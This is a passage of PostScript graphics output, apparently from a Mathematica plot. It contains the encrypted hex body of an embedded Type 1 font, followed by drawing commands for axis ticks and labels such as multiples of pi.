+7D593F7885526AAF054BB850C02E863D831ECFEE61A781B89867139889A362F95F48A837ADB955C9 +939F609D2EBBD56775151D2EA4B09D38FC1D824A952EE7E52849260DE61F07333076CF887A3AC2F4 +CD088C29E47715C5242E2366CB493B2FEB38C19FC159EC50EAE88409CF0A30C0A6823C45D0532C2A +72E45A17916F6CEEB475C4D4A19372AE271326697CCCAFBB43D92C25A052797186FE8314FB41FD94 +2A4B24548866BAC19A83BCD2E6979FB3C7B70B075DCDAB3EF6B6181A00A98AE73B6D968EE2DDEF07 +503A92E4FE1E0B67A90A2F351D600DF960101A15808AA99B3C680A8F50D5CBBC96D98A3A2AD5F14C +43857F4CB9DF9372FE74B5D6CA9CD801667399E778B56EF702A56F0F393137B20BF11BCFF9DFC0F0 +4E67649D07A2A5F4C42C9A929231D5BACFB6B53210E9FE311642D8BAA7358E6A7370B6CE921765B3 +68A354B42C8877E59227146409DA83E407657BEB475329F228CDFDD11BC73123234649AEF0E2E9DA +76C12AF91713828368FB778905A6B7150258695D4D9DF6111E1B28A9462002D7C476FE44A9B13F32 +9FF84930D213787932A1BA01EA608ABE7054FFDAAE2176EB960005E5407D7C1D39AEF8EAD8683A50 +D93398C584312EE4A12C07E9D55AE9981D7EF57D66499CA93EA653EDDA1BECB494662E54CD7ED8A3 +0B2A8522CAB12B2751F7E9B3B66CA0B5C8905E0F3A51F68C96E9C02F10FE515FD6133D3ED298D15E +8B1649F3D13341BDADDA7FCB838720E8D0D9DD92D0A241A0CD8E25D7B313DDAA2F25B543BB0E7965 +402ED0F24AD146E49919ABD9604ECFEA5A7A49E58664DCEFDC893F5D722CF24A44D26369F5D86569 +9632141348086A80AE528EDAFFF9D9986D5665DBCD375DF221D5EF1757D79361E5A5BCBE333B6C9C +1CF46794A7C7C776477023BB298C970F6DFF9AE6C7ADDA8CEBE73B07117BFED6CED2A36548081C79 +BDA9A70C8FC5FA16D0EFD3E9F869DD5DBDF6E70CDA4217935FEFE577B64DA1DDBADB9A092B9D1E3C +E1FD3B6E0117DDED155313A5DB7D8742C3409FC18B9743F09ADEC49BFF2FDBBEF9D5FA7110266287 +7C65E3A1421BA56E258A49D76C436C97AE2116F772CA5EEA5726BF17AD5D5CE37DC5F45235730E90 +A1A1E3087132C820EB9E0E311500F2CA193C72E2ACCB4D77ADFA34E268B014FFAB5DD1BE7187251A +A69B7BB3A517796BACEFB9ACE0114FAAEFB0D9BCA028A52F5037291232A04C2353B9663BFCBEC2D9 +30CB007954B8C6396003214262AA9CA9FA876B4191313FD1831D664863C4A19946AEB8F4E21C468B +9C94B8CAA407A74AF418DFB60D46BEE5029C884950D3BE8A58023DA864E9AB34005337D335B0B35A +91DDEB53A54C3233150E27225B0800C841E489E9EA6C12F5D95112BB723C3E88AAEDA3A942D06242 +2CD80B04DDF024ED79224E166086C5770EB10C389D0BF0327B2F753358D9BD552C04EA52BA154EEE +5A84C51FBBFC79055AD0F1243E489F82FD3D1A3D2CCB24A02DB3F306767564A2451DA405BAFFED98 +20241A82C6F4F6E1D2A36FD954540EF3C091247120F5E1B362D1EBCBF80951A3158B1547E7A0CCFE +40C03F992BAD00496C32BBE9B0A06EE9554EA3FAA247A7399A37D05329CADB006F679B58F2E5969B +13A5516A9F6949505A64B7B3FE5E748B9B9662C05E6C5CB79D64FD72C54F557ADE72880B3F9D8718 +58D5EA3FEF2BD3FCFD670794AEA6144D13782BA89648C98E7CF5160089DB9798E49BE2DEBC2669C1 +0C42AE1AD7C1FF4921EF465300977E057C0AEE61579460F56E51B6EAFC1F7F41D669ADE9610EE777 +055F927444F971121CD76A55A273CEBB481B89D6B78D0066ECE31BE3EEF65CE9FD22D22EFD6E3ED4 +536E6439782AD53550CEF1A903125F228A3E2F1AA3342B0551C59924149358F8E941969125F6E54C +8B2C068F57FE0DF91912CD71BE9492768191F4F6B70BA45C72409D4AC6E9619E8A34398E6A66E984 +55F1793D8A2C0DF30EABE2B19679318AE09014262DFBB9AED5D637653FBA1C10821908ED6E088910 +AA033E2E0798A630966D29F84845A9C937C27A268CAB8BA1AE9B32E12B52EE4B64BE5388AD32035C +7F98904F052B31D7C4819E27BCBC597E8503A5614E0DC2BBE5C51922980E3F492B61BEEB169C3EB6 +AB9F1DA82EA6BCFBCC16199923C8399B0495EE9A9E1749DAD9FB289FF3FCCF34F55DF7D94F91EF31 +B3B4C8074C567C4FAB337A337BCC2F459075244F665B079C159AAB83781E465F5259D41313183EC5 +F5F53BFB4797942F93EAD6CBF9255F9B4DD0748A3BC6BF36ACBE0127AF68EA6566B65430D0595FD2 +A7A2FF74055BF2E70BFFF2B79131F1871CEDEFB495FF914B88770654F9E5556AF535E1B9AF812004 +99288AA39D1388ACCB5B11B13596B550F2746B2A83B076F4F606F7580156E54FBF6976AA4CFC9581 +0A7FAC41A1635FDCFD6F7CD6BF738190D7F9FEAAB8C0B7CE38DD1459E2465C3B75625C8BAFE3B60A +F66ED183965AB9681A8174C44311D8EE36E468A8FFE2035B7C5AB6A372FE37FF627F4697C0D19F7C +8A1E356F829BBF2B8F4A95A49F85CA16ADDCA5C0817D6A4F7C4EAEE908DA13E0C89C9AEFF6D1D7B5 +BCD1BBF672B46C4960720CD1C74E70C78784CBFA8930576AD4067D406A0FCE9248DCE6D610D7EF0E +97F3F9CEA1D08DDA90DFF0C484DD32265FD13A2571513F361DE3061F2EA76886112AC7589B290220 +E34610277CF81535CD628CA688CA812275D7B9909757DD519F1FC89FE4D0AFE5FDB999323A470C6A +A0D9BA9CC92BAC24514E7CB3A3EAD2A70271EA8B02B2DDFEC6CE803F1B761D9BB7099FFCBF918D8E +B602946FB0DC14F0FD1289037B15A4A96A4605BBE53BCEA9112BF9746F3BDDC06CCCD808C62F2B41 +D4F508EEFB03AD22E2E154888DC63C6BEC6A21D1851A5C82397FA49BD163BA8A72527827E4B6F50F +585325219FAA9B3A2CE14A0134C19DAE50373A0F9E6DDC8205467242D11A3989D17730C8169964B9 +CC9549BE20A84FD9137DD9C9F7DEBAC3A41345DFEB0AEDCD7ED408A909000FE8D9CAC85D93052256 +7A2C9312769DC85F902D4A5F5766EA3C561549F1F2B4C5269276946809ECA26B6F51DB4CBDA9E668 +BE1023D8962C0DBCACD5BBC9E5F61C459B825036E1322737C0F196C0DF93DA76011DF2CA06F7B383 +8C672A802EA24A474ACF7A51F2DE867ECAF5674B1053CD5419F5FAC20584A3F7565D7CE584CD395B +1968B622FE3C68DAD2F0E33274DFDF03B5A8EA047B077DA1316DF487C91ECEA84E9B417EA25EC9CF +1F1CEDD7A1C2CB0D51A58BD8F9772FAED8D553141ADAB148AFDA200479CD04C0FFD1478EBC618303 +5437A5BC1AEE3218E9B27D21656EB9F31BD4E7D3186C89DF251207E8B67265585083111BC1AFD4D6 +A2773629147A29CBB4BBC3935B83392487858E0D18FFC96E57C83C4C6744C8E0DBF001DFD64B660C +CC8064907AA4BECC12376A1EB55EDF655CBBB4744C1A6166590B9572073A2AB577EF446B80567241 +389F990AE6C90B286EB48454166BBF264422FF2A387FA0B413F2295B6B188A64927DF702C232CCAE +59A2CCD1D109840A464BAC74A45B865A6667C901D86F771C4A36421308551F532497990BC15DA648 +6E322566C210C517DAADDBC24DACB39CA41611B9F961E4696D1FEC46E71C608DFDEEF19ECDD88724 +24E1BEF7176B0AFA4888BDB4C56C8690AFD03428F32740DFBC4BE22B7583DC47BBA42DF4E83C14AA +29F4E79397BBDCD2EC43338BA1F0D2CA9DA6E64A065FCB0073ACD0D86E46EEBF1454C9C172C6BAA5 +0F37FA19756B05405763387237794E9FF74E6749BF6CE5EE9145413950D342DBE5B0EFDE57163127 +2A8D060E935547E1FB0FB1FD60400FF856D027671CCAECFF7E215BE61E8A77E9BF5C72C2C1E4501A +A11B2F8574BD823574EC9598D579A9C5C525867F4BAAAA78DDA0E5BD7AC832DEA41328A507874A85 +90B7F133E743471D4FA27DFAC39C6F99E233C913183B2A039CBEB5CB3BF8825A92D83D266246D5B3 +CC7B11469E611E260C6ED16D17C9693B13B78E3F0DE2F0ABBE73FD6AE1ED25F57B4894254FFDB332 +0E65ADA53669B95CA28BB4BD166507E9D8F12727E46D2B9593186C090764FE8A95F1594291FD551C +A96E4CBE1D6FD42852B2B65E7F10C4F17707F930DD934E2A2ACBDFA40E04EABC1E54632D67AB7D5C +00DC103A3D11DCF78B6771D98ABD5CCA0B253283C67B0863C80D1A78FE6D5422568207509FDB1946 +92706C7A211B29955F6354092C9732DB2ABA8CDAF407FF25B40BF9D73317D5985E19E6C12B6AB5F5 +DD59328905F822E1EBEB87C4E386EF20CEB7EAF842700F09BDC50D7AE6442D1C93804D56FE194785 +968373A154E1F426BF76692CE3E4474360ACB9FEBD3191B8EE909E7C224EF90EEF36CD660AC9A642 +4DB5BB20B8835D365D35A442ECB2444F30466C3323001A087639B73848E3EE275406CFFB495ECDB4 +52F2A357F45D2D32BB22CAF9F9C2C44741A5341B29BB6C4322287A2A3891E1E853B976E17DD9306F +D98BDE8A0C97ABDCC7C708BD1BF49B524CD0DCECB40DDC557E9C90A1EDDEE57BBABC4C338F08A625 +E03C1C1A20DEA709051EB1A3264D7002D6DD2BB7B622AF93C7DF54F49EFA5FBA58F115A049A91875 +A2476C19F9133D0BE1B07C8102746163CEA0A98F9B62EA59C9CED7AD808DD52DDF8687933AE52A7D +9D7081150A812801D3FA78F90C4933E5DF09C991325324DEC6ED364ADF73DFC7B78953B51FBA2F81 +F264C2A94139289CEBF7ECD6D8FEE9E579BE231FE1ABBCC07B4BF1884CABDCEBFC56610A5E2B7510 +37FE804511FB5443F7B21290E38855F6DE5EE38960E02481DC57F83CFCB87C8FF1CB196CDC19B2B4 +6C7C72B64D7D45C678851ED7E2860DE7DB772BE7B33C84ADF7E6F9B2063D1263CDF55E6220753ACD +67C4701EBDC0799AF47AC58A0CCE796384A50DE6A814DD994B372630E64E5FDFF57393522F689DF7 +81C44599B21AB1C214D4ACF94F07CFEE79C628C85378B96D9007ACD4225E14DAD8C70984DC596DF1 +96BC814E7346217C94F172FA40B3DFC73C30E6E530DDE4A91F6A5166AE19EAA3D2CC3D9D6917BFD3 +1EFAC19C236463AF8D7FB7D9B3A4D6FB6D962C59B296E988561957A3C3D11F33ACF69F5768A2DA30 +462BA9AFE67D3C41A1E8368099361F50D4F6368963A48C75F1590804E7918A02EB9DA5F60F49828C +95AC60E9D86DEB7699C35037669C02D408269D6BF481EC745E4EC630F68FF5168BE5E0BDF875EEC1 +5EB9CAA9CBED1CE2A0EB4CE97C14E10114087DCBE5DE1DB6A070CBC6B68EE141B7D62ED320F7B74C +07D9762E0F5C8AF0779D38B7677ED65B5DD2F83ED06F041B5701228EFEAA0FFC031E44D6D68B274A +45FF9EB62FDA007CDC98B86831E9A668098364B421E1FE2A45D85824612A521777C6177316F0C6DB +D9847A2F61326E74A3114EAC3ABAEE456156DF125E4EDAD6BDB66E7DA6370C90ADC4AF4EC1958170 +C32D5AAF3B45BF749EE1DFAD8A5D0C03973B7C1589EAE4E67F6C87213C721E4A33466F3F54253545 +5014417CFFC9AF461CF695F5E1D7A37E4C7680A5624AA11EEA65C59BB38A96734E4A4A238C636638 +9EB8083D5AD753FA7F74EDF10054315EDD53DE61D48846F70AA9272626E23BA3DAB7CCEE819B0A88 +9CE775AA7F5205C95A19AAF475729D2C0BCAD9AB5459380A5F034C108A64B80621820D779582A198 +14058DFDCC6C2D6461AC6F98C64AABA53A2EF77CEF612EA766FE15498F56F54106D70D0F8DD4134C +8C64B282E79A96F15D4BBE0297885ACF775BA5009006315637D60AD86D25A3CA6AC5BF5B4DB95B1A +672A8C589D89101809D838236560F7690E329784C1D335203BFED3A258CD79467D16B6DA06A282BC +4B9669986CB50C54DADE3D5B20FD5CD9FDDE60AF4B5D8D9C50E77CF50DF3B36F37F381FE7E28A719 +91C8199D18258C09BD0440F5E258A5D2E22C6CFBFDC5F91228992E86532F4C0A50067BCB2D4387B2 +9FEFB8043D7BC44A322FD3629D7D92B6EEBA21B035DAC884110BDC6B22CF59B08C195BBA1C682E5F +8CF32F479937D329FE8EC6E9A3A3AA63AE95EEB766E0EACEEAD4DCF46617888AE687009112732A7A +8FA8419A4652075EDDF83E291613B66BA793D3858CEA093C79B89B0C93E11CAAB86AD1980C401713 +0B6A02545DE484FDA6E4DFBCEBBC848751B2A8821CB3F7AC96D2EA9B83B575AB60CECA41EA567EE0 +8ADAC8F1060255057527485D6B12A26D2E7EF6892865FD65FEF28F8B46249C4F19341089D59DAF82 +582CAD1A3B53C763A0E57134A57C4A24AB4FD358592ADB01BE8F1D9FAE9CA97A3BC3A0E2939913E0 +62960CC1D29ECEF9E61BAC20E92F13C49078E7F1562C9D7C01C2B300ECD6ADCAC9AA0C1F1BA30401 +0573F79D158C66D91A8D987C5239C9D4FEED1DC5C9586C4129C33E7C737C624EE9BD1EDE38E9F72A +78DC19E144B5AABF3B0FB72216815E371A5D6452684965CB7208B87CE5A27E444820E03F80AD2DF4 +E280D25D9BDE41E719BB2C939E25B7965DB162CA8665CBFE65DFDC7992A508D54FE4EE8454C11482 +7186A280D3D9EDF397640A809E3646675AB6621B9CDF42808E2F19859AC975CF70F41D2B3D22F8E0 +C180126F4A12122B207A150BC8E1819962DAEBB821DE59B7EEF8FF9219474597AF859E353B4B713F +5F1350F4049DCE99627492E396038B10A2F8E82AB679F65BE14A166E4502921BA44CCFE04E5DD3FE +B04BA47C3F7A3E7DBF7D55328AD1E96092C73EDB16C3325537295DF768E2633D01304EA0B01379AA +DAFE6CCA2AB3E246768C5AC841A458A2F69141A9A9D716D129B26643F1BBC95D8CD0ED44148F7C6A +F370201E454F4AFF7C11A8080508FEDE242343E7ADDD5A8AAF079C50765A79BD25FBBDC59EDF980F +FE0B60435692C49D20AC22F8BD1FCA3F3D8200CA26D61A30212558B54671E63BC09776A3AE7A906F +CA63281F080A00500C42C02B8F82357A3EBF572CFC4BEBA3FE86537DDDF23A861C240A31778A131E +F638C1DBB7E87A45487C092D23FD9FB2C162C3253636ED263B141178FCA9F2D5BE2D81F99B2872C4 +B3C08749CE18C9C00E75DA6B3E4C6A6DD79EBA731618EF5B5E767BB40429D8FEEC6ABFE9975746FB +3A82A03A07B7D0DA8BAECFD1F72AFE17EB0C0CF100A2D48F4449A42C482BB1D64C19F8FEA73F5BA1 +8FC9BFEE3F640C39C081669A9B0EE3FF6B2BDC0A726301EF0E2259E65BE59275C76E7A3F1C76C3A3 +3AD0E2F79198DCA39C482B4E1196238DBA937692CF319436830BBF441C0A8A04161DC0814B5DF049 +83099439EF421B6D37D351D4A988A8DFE93D796B2E8B2564C602F79E6162F56F933196A0DCE91051 +600BAFFD9D439A91F17C20CD6A9104B553D823A0317E3C8344E9F0B2560AD583BF876AE307892500 +2177AF61BDBD745CEC2B2A7931D27423D2667584AE0D6CAA2B281EB9271ADE86C493791AC9A2265B +8324F764D20DE65F6267439F1574DB02C600E771D3C743D420FA6F8BF01A977B91AF035E0D5412AB +0B85D6ED3ED9D0345ED434F9B95FD911A9D3828CD162686E6ECCD2B6A5B1104F0E6838AAC7FB3FC7 +09F08F8E82B4BFCB55D8984771F9F4D339EE7FF391448C7807A436A78B6A487D3A5A86F314B302FA +C5BE1C1DB9844F975619D615D1C7A20EC2B144797E0648CF5C044C8DD1699EEA3AC9D7E3BAA54A85 +11A932623D5ED3F0A9C3028CA439AC395F58DEAF1C0354A169D9AC7F380900D9828C3ECBB975F6FE +6BD79EA4BEA9B71F3A9B1D2EAF8F1E475B4FB99758192EBCDA21B47EA33F57C58E904DA260C801AE +CF457C84592B81CFA96C10E448D705D24871F3D1AD1FE004406C8070A54FA3747788C5B55E9462E6 +F51378BF3F848360542CAD2D5FF9EDAC84C164DFEC115A2F3D873760EAE58CC8F361B37E6CE076EF +325A1C54DFF84DB95DB7DB5B56C48ED15C5426E6153D8A94B1A35B22EAB1D7B871097DF12C093BA5 +538957AB7D0AB2E39A2D1AECB91F0A693B8F6A00601929B6C55AAE8A227CAB6404FEBCC8BC4EEEE0 +ADD4CFD7DEC225170A0063457918B9875AD7F022A8F9932ADE316E4126EAB75C1D0B2B9F44E85F1C +54755D1301345665EA630C8E885A8D9AB069DEA2CC6D12E4A0BF6E80C3AE12BC7ABE507422A5D92B +65F70B4A472DD945EBB960880EC4C34E4C206C260FDF86A997D7D399A0219A51E6F8BC1189EC0ED0 +B8686F0243BFAFD829979747442AB1DA8282F10F4C37C4E6C88D231460DA3BF34C23A4755E2F8F21 +F6D138C86B6091CB3BCE5ED170242C4CC87C010FE63DA9A2ECBDD85311DA8572AD67E40F744D2EC9 +6607701D9790574F051C859EF29291AFA301C809E0A5513DF9A7FC2DB1776DBD4A2CB622BD17811B +C0E584A8D89D4BEB17C2D0AA8BF31CD7E2B36C0E1888409788E30EAC2E46AFA1CFE457D3A19C28C5 +80669CB82CF36BF40DFAFED78F99A5D5DF189CE293413FFBA9E8D2457986C68483242AD767D5F026 +1CE303153C35D5DEB1789448088B51C48A9B8E903BBC69ED7FB0129CCE33A0337198F11DBA94FDAE +AD74BBC5E519F559094E15B03AF3EFA89DC38B4278C68D2AEEEBE4B28B351D7B72F52D94480D8CBC +06544645F20800B8284A4E7C8FAD59D0AA8EC8EC0551912CBC62694A5DD15C469BBE614FB187C084 +838D676E5A1CC8DFA8676758EB7D53FD2BA8F1C434F4F70AED8F2CE27EED2F6A82E20E30EACF9BF0 +CE28B4BF7D556815A887D777B7D75F60D2C410AA2D378B7BFAA6C3A5BF0A5EF80D3E35A0CF393A5E +BC27A895D712C6F004F1A03F9FCF493973F33E6FB106407DFD992AB0E9E36EF395663A6EEFFD71BB +2DAD9DFE6AA4685F307B8FD69BB2F74E672666414A71FA479B37D3DEF6AEAF80FA14821C65F7ABBE +5CC6DD49002216E23B3D22C282F3DE0077EA81017E79D8C3BDB61EC031CFB13FA981120A6C518F4B +4C39C9DD5AC6EDA29ABA527C9948BC3162EF65E8251C9D4E3494C6A51A41D489F8BC89250128EBD7 +0EFD01B9F03C40B6E0384364F2571F7D969016A959E4243D7AB728F0F030B8E2FB456D8E47A85898 +313B0E91C68C7A8A7226603427AC6DCB5C69924FD026E90CB0EE89AC42D874BB15AFC981079E9DC7 +1271C3E461265AF327D4AAB4AEFAB6A9DC3F84DCE7C7868D4719006344B9055C8BA952A2250B8041 +E5EF519BB788201124BE90AECAC2293A310D9565E1EA4AEB99F7ED7106649169E8EBF3DCB210706A +F2FA65158D3059DFBD7AB5B00DBB06B016F73FEDB3AE1C1CC03BC2D94B143BFBD759338EB181B1F6 +841F7B539D8D126FC5B31B244A3A00ABBB121A98F73314D1F1683F513C3CCC9A0C2180824ACE5D45 +E454062CE1217F7AFBDC60A6022B0134EDA6C5D787DE8A5925BEB374F64D612329B9AC17B6EC03F8 +56CFEE502C1FC3AAC7B6F251E8DE4147DCB1580185C406F38E6B729307EADFF6D7A0E824C9830093 +F0C4FECEEFC7FF839306FEFEB780FFBD8879F22AFDADCA4C0767B8EEAE5DB869D7BD91355F0255E1 +CAC68A81A276967F233624DE0D2082B89E2C2D1DB0F8BE0B2BD7051C4DE9B1564AA6CBA03E50386F +D685943D1EDDF5BE0EB34418C48E5EA645CBA552A0444B254E82E9E84A5B7BD0064D5EA87B1716C1 +4EF7FD14E2187FCE16FF6ECBC0A6588B30B4329626F024BDBA65457028668BC6750A4DD668D017CC +EF35CD9CF45EC73885FC91B8AD78920919B4747A710D25BB850B558C5CCF7170C20012DD0F2874A6 +699DF53EDC6C75716A5B6B06C98F4904BAD22B18C77B3EEF32DE3F45A8AC12383DA16DF6F06CD923 +D344CFC2253ECF97A52F2DC6A22539231E29A324F851265BA82BE566E42167247CEBD914EBE42EAB +E189E74FE1FF17ADA8A5F47DC9866CF86694DEE28EED333B0A8AE380557820E3F1D32B05AE27FFE1 +68267FADD310C4EE550F71704EF71F4C669952F30E485AF37561884066C0E3425C748BBAC77CC7A9 +87EC336B8BEBA44358BEA4ECFEA32494A8006E9852C4BFCB1C0F00ACC247F1F8E3F3B34539C67638 +64527F9F885132DCACBFCB1DC80EE3B2A711145DDA1D3B5F83144E2CD698D43A02B0DEB706C78D75 +A24FA39B9374E1155969FAD7D5FB477F4C3C7440DBFE1BD1DC877360E8690A6D3A64EF0A1313A520 +C49320295302227CE5625E134EA442A537505D206EE46E7E218BDA38F7B6BA124ACA0E949725CEEB +961EF8B0727E3A78287E61E65A84AC14D1014A213259A48F04C634C1F04C73B4110D0DB491250CCD +7DAE323CC8BD29BEF605DD92AA5480009DEAD1256E5C9FFB18362D63B022C2A378D15ADE2C6AE603 +1DF385CF090226F0AF889464584A9EA63B884453DE231058C5661C4F7DCF7505D7B1E48C78AA5799 +8FF39084FFF1CD18CB2989D867F2E085B291FE52367B4E8667E5CDA4F41DDBC7129DA5BDC39549E0 +8B67D9C9E4C332D91FE261728521245CBF51870F24C42F5814F393719A9E126C5693C0E776E4D8F3 +0F0288537B8E9A7C5DA4F931FC83F96A1950B1DF26C0448B646D3BF42C0429E2BD0164703FC71833 +19DDEA75CE65D9DFFE8369787FE664306D843421C2C0C3A5B210E823F8366161A96CA88D95FD6486 +5F9E5B0D53DCEE4A98AC10A8FF1BC34A46DB6016E973C9FA298D3F58228E3D9FCCCF9632556CE2E7 +F9C81E05FDB0FC1071E69A4C158E742D0B8939CA3DE33A4BE8D01D679C81C6BA9CF396A6768CA626 +05D796AA5C323E3A6208F2DA5000FC4462ED81AD0044D9959E40E4764562ADA76E33EC63271966F1 +7A13AD376A54FFA40FA247896A22C1C4A4CE51094CA1892A0B9904EB762839AAE1EDB5A0A5A69343 +CCA45F88F61926B23E6C85688862B1D10F1ED827FCCE2A427E49D960DBEE0D39EDE08D2565C6F5AD +66CA83DAC1467C38F742132F715DA7E9757A5D067FDB4A8859D148473F302BF6ECB9B7EA5C0DF851 +8F58D4D076625B92BC8201028064950D70CD40492DA83B98FFD79BD3DCD9CEE95178B6DEA9AB10B3 +4C61A74B49C3697CF714F56A9B1E366B04500C9A67704AF6F721851EA4566B96E220E7B526873F94 +E6013EA8C489639D291167BCAEFB661C96C27DC7BCD5B317C1F101CD8DF2FB29F6162B5ECE903C0D +5570C8C6325F05218850E4A5B5F94C7CE334BADDFC5DB98EF5333B4A92129F41D046D0F5EB6F342C +F362BC8E45511FCF328E2CE2D4C579516307AEC400BA207071C887F5185AF536A6827307D7698095 +E8A6F8C19812A11C32AD207FBC353172C8DF626C5C05CD24C171B3C8DAB270A74AC48E35F0A8849C +E0934B93D56C93599F5235EC441B5232257C4C6767C7B5A35830010E60E56AFBE9199B42E725A216 +C49D45A3C554767DF192F04D1A192D5CE196831EB7A56201A4A96CD44DD084729774334F698E1902 +614405347A37A4C753C0211D7F24D5265CF033E3C4D30E61886CF781D2AC30385E6021A892AB116D +1F5505635BF5C915D0300ACA8AC32CAA0F3639550C4AEB390DA7B86E53B6BB0E4819626757BA9986 +BCA4B4B18F6BF3706577A3BE146F2585025D5A36EB14E587C5469EEEB622D31FD32EBFA812B9CCDC +CFF7D17D00D9F21BF8871661F20E89A25A4543068EC509D0DF7DEA2A24FF68957943BE0FC7BD319D +92A575E12E6FB8112D72A100FEF3EE85972304BBE07FC1026CCC068E8A414F641116E51F76009C5A +F9E664BCCF93C943CFF2115235BB3290F935AA3FAB4F2E73FCDB9FA5E1866EFE278FFE7EA9DD6F89 +38CD5E5F4F31F6C659AF7EFF5B291AFB86521678B42C99275024EDAD04E5929D201A36F4A6C4DCD7 +2E349D6B9A1F90B123DEDE3DA50EDF929F9285747CD504C8F4A73D522F312D623BD65A35419C0729 +30976129B2D99B32D1DEDD81D64F7879CEDDFF04BBBF1286E07BCE651E2DEC190DFB9D25F3C1EEC8 +D7277752BB7CCC313A0FEEBF0EFFA2A189861AD4EA13AD4FDBD5160DC273F12525815F0D693C1413 +AFE4FBE09BCBD71E16C33E6CF8D18732447FFDCC2E4AF9E270D725C1D262D96E72538CA3309BCAF2 +35A3FAFAB27D265C583E6F6F062B555C97DFD89AC46E6154670ADCA13FD99F7A4B9B8BB224D43764 +8CC9DB76E177F562862C912D8CBC248A4C628FF2D0C9688611CED3DFB89064B988F16655633B7CC7 +AFAE34B2937528EA0814ED245D6B0D2AEF87A5B63E2BD7E4F7D9CFE372C295A0891F97C3855C97EC +C03C7C2A231704BED419612255F8B2C9262D48CB4FB46D63CC9697A210FA9D7BFC3BAB7E46172D3F +52A4AF9C4114BC72A5C7CBA042FA633AFD5E404F29408D4485837E55E6F9702F04C7AB410C351039 +6A78C8672F8EAD53BB9CBCED63FB9E72E7238CC88FB4E7C48C3DE3E4B80E277B952727916A4127A2 +5CC1413C390F4DAFD5253B07BC96DAE8CF4DA08330DEE580CBC1E12B75A661819E96B018D47A8B71 +B6BFAFC5E3CBFE68E5193417B6E730E6A2820838D22049BE6BB64B74AA13779D46519965ED80D5FC +30B0A6F73D26DEBD8150B3D27B3F135F608D59BB1632AD9C2E11177FAF54CBD1C4E58D58C395BAE8 +AD7C7AEEB0E1C3F0C0B7A5E7142E9A1DCCC8B4EF56C319D4A4F750857D2FD180F871772B9CC69FB9 +B222F83C3ACCB66125AF6848B2EFDCE3D2284FA5844641FB32F701FBF32F1D2F2E2233B66E36CCD1 +49FCB3FCDB6EA04367D11624717D73D9128EA7D9AABB8658BE9E9986E532 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +cleartomark{restore}if + +%%EndFont +%%EndResource +11.52 /Mathematica1 Msf +0.75 10.5 m +(p) N +P +[1 0 0 1 -61.69 -151.566 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 105.842 m +73.497 105.842 L +s +P +p +np 52 98 m +52 113 L +69 113 L +69 98 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 53.44 99.467 ] concat +1 w +[ ] 0 setdash +p +np -2.44 -2.467 m +-2.44 14.533 L +16.56 14.533 L +16.56 -2.467 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(2) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -53.44 -99.467 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 53.742 m +73.497 53.742 L +s +P +p +np 52 46 m +52 61 L +69 61 L +69 46 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 53.44 47.367 ] concat +1 w +[ ] 0 setdash +p +np -2.44 -2.367 m +-2.44 14.633 L +16.56 14.633 L +16.56 -2.367 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(3) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -53.44 -47.367 ] concat +1 w +[ ] 0 setdash +P +P +1 g +[ ] 0 setdash +p +0 setlinecap +78.19 2.952 m +78.19 5.849 L +s +P +p +0 setlinecap +92.764 2.952 m +92.764 4.69 L +s +P +p +0 setlinecap +107.338 2.952 m +107.338 4.69 L +s +P +p +0 setlinecap +121.911 2.952 m +121.911 4.69 L +s +P +p +0 setlinecap +136.485 2.952 m +136.485 4.69 L +s +P +p +0 setlinecap +151.058 2.952 m +151.058 5.849 L +s +P +p +0 setlinecap +165.632 2.952 m +165.632 4.69 L +s +P +p +0 setlinecap +180.205 2.952 m +180.205 4.69 L +s +P +p +0 setlinecap +194.779 2.952 m +194.779 4.69 L +s +P +p +0 setlinecap +209.353 2.952 m +209.353 4.69 L +s +P +p +0 setlinecap +223.926 2.952 m +223.926 5.849 L +s +P +p +0 setlinecap +238.5 2.952 m +238.5 4.69 L +s +P +p +0 setlinecap +253.073 2.952 m +253.073 4.69 L +s +P +p +0 setlinecap +267.647 2.952 m +267.647 4.69 L +s +P +p +0 setlinecap +282.22 2.952 m +282.22 4.69 L +s +P +p +0 setlinecap +296.794 2.952 m +296.794 5.849 L +s +P +p +0 setlinecap +311.367 2.952 m +311.367 4.69 L +s +P +p +0 setlinecap +325.941 2.952 m +325.941 4.69 L +s +P +p +0 setlinecap +340.515 2.952 m +340.515 4.69 L +s +P +p +0 setlinecap +355.088 2.952 m +355.088 4.69 L +s +P +p +0 setlinecap +369.662 2.952 m +369.662 5.849 L +s +P +p +0 setlinecap +384.235 2.952 m +384.235 4.69 L +s +P +p +0 setlinecap +398.809 2.952 m +398.809 4.69 L +s +P +p +0 setlinecap +413.382 2.952 m +413.382 4.69 L +s +P +p +0 setlinecap +427.956 2.952 m +427.956 4.69 L +s +P +p +0 setlinecap +442.53 2.952 m +442.53 5.849 L +s +P +p +0 setlinecap +450.12 210.041 m +447.223 210.041 L +s +P +p +np 451 203 m +451 217 L +459 217 L +459 203 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 203.666 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -1.666 m +-2.28 14.334 L +7.72 14.334 L +7.72 -1.666 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(0) N +P +[1 0 0 1 -452.28 -203.666 ] concat +1 w +[ ] 0 setdash 